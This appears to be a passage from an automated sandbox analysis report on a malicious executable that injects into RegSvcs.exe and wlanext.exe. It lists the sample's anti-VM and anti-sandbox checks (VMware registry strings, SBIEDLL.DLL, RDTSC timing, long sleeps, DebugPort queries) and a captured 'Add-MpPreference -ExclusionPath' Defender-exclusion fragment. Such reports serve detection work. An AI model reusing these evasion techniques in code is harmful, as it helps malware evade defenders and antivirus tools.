          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00404837 push ebx; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C892 pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004151E2 push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004191B9 push esi; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B3F2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B3FB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B3A5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B45C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C4D4 push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00415D14 push ebp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00419F79 push ebp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330B3FB push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033091B9 push esi; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033051E2 push esp; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F4837 push ebx; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330C892 pushfd ; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03309F79 push ebp; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03305D14 push ebp; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330B45C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330C4D4 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9019999335
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 00098765123POIIU.exe PID: 6396, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000032F85E4 second address: 00000000032F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000032F896E second address: 00000000032F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\00098765123POIIU.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\00098765123POIIU.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6400Thread sleep time: -103772s >= -30000s
          Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6424Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\00098765123POIIU.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5988Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5776Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\00098765123POIIU.exeThread delayed: delay time: 103772
          Source: C:\Users\user\Desktop\00098765123POIIU.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\00098765123POIIU.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.610911018.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.361375592.0000000008540000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00409B10 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01074015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01071074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01062073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
